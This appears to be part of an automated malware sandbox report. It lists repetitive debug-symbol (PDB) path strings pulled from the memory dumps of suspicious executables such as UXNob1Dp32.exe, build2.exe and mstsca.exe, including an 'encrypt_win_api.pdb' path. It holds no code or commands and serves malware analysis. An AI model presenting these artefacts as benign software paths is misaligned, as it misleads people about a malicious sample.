Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\\ source: UXNob1Dp32.exe, 00000005.00000003.2097904032.0000000003328000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003315000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098947888.0000000003399000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098229104.0000000003390000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\} source: UXNob1Dp32.exe, 00000005.00000003.2176662041.0000000003371000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170142307.0000000003383000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176808323.0000000003388000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183899817.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\*F source: UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121265677.000000000337C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ty source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142833395.00000000036F5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.000000000348C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098470460.0000000003489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Application Data\Application Data\Microsoft\input\en-JM\ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000003.2192611386.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\v4.0\m(4ZV source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ta\\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.0000000003844000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.0000000003835000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000000.1746999590.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000002.1751118423.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: BACKGR~2ntkrnlmp.pdbndTransferApiGroup source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\oft.A source: UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\1fd79}\n source: UXNob1Dp32.exe, 00000005.00000002.2203764277.00000000032E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.000000000348C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098470460.0000000003489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\{ source: UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121148461.000000000339F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OptimizationGuidePredictionModels\\bbwe\ation Data\Application Data\Microsoft\input\en-JM\ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000002.2204030109.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2153418605.000000000340F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152535019.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: '{aC:\gefolusopu\refugefifacek-cibecuciru.pdb source: UXNob1Dp32.exe, 00000000.00000002.1626432855.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000000.00000000.1621402719.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000001.00000000.1624079487.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000002.1650673211.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000000.1643851973.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000004.00000000.1645744558.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000004.00000002.1656657577.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000005.00000000.1648043653.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000006.00000000.1654206960.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\2B_cw5 source: UXNob1Dp32.exe, 00000005.00000003.2099016329.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2076215601.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836615176.0000000003153000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099758029.000000000315B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075944763.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099141550.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\icat source: UXNob1Dp32.exe, 00000005.00000003.2170643885.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176027330.000000000331D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171552388.0000000003301000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqy) source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2195346057.0000000003154000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189453431.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188598539.0000000003151000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195447541.000000000315E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194516135.0000000003151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2188967976.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182066894.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189516260.000000000340F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2182625216.0000000003795000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2181866623.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183364884.000000000379C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: UXNob1Dp32.exe, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ta\j source: UXNob1Dp32.exe, 00000005.00000003.2177220754.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2184429600.0000000003303000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176460771.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183310542.00000000032FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l2+P source: UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\w source: UXNob1Dp32.exe, 00000005.00000003.2184193882.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2177560413.0000000003160000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175249606.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182377218.0000000003161000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2143045525.000000000339C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142579467.000000000339B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120473217.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UXNob1Dp32.exe, 00000005.00000003.1736142070.00000000097F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorW1,Q source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: UXNob1Dp32.exe, 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2141965591.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142726213.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140931110.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\a\ source: UXNob1Dp32.exe, 00000005.00000003.2192869446.0000000003692000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193084806.00000000036C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120473217.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ion Da source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\~18DQ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.0000000003844000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.0000000003835000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000000.1793257120.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000020.00000000.3617544736.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2182544147.000000000344F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408904996229952.txt source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\f source: UXNob1Dp32.exe, 00000005.00000003.2120429793.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119548064.000000000315D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*v source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: UXNob1Dp32.exe, 00000005.00000003.2182625216.00000000037EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189117308.00000000037ED000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188768311.00000000037AC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2187900703.0000000003785000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\% source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2075994382.000000000313B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2171385752.0000000003745000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\AC\3 source: UXNob1Dp32.exe, 00000005.00000003.2151962595.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\lpane5 source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\k3a source: UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
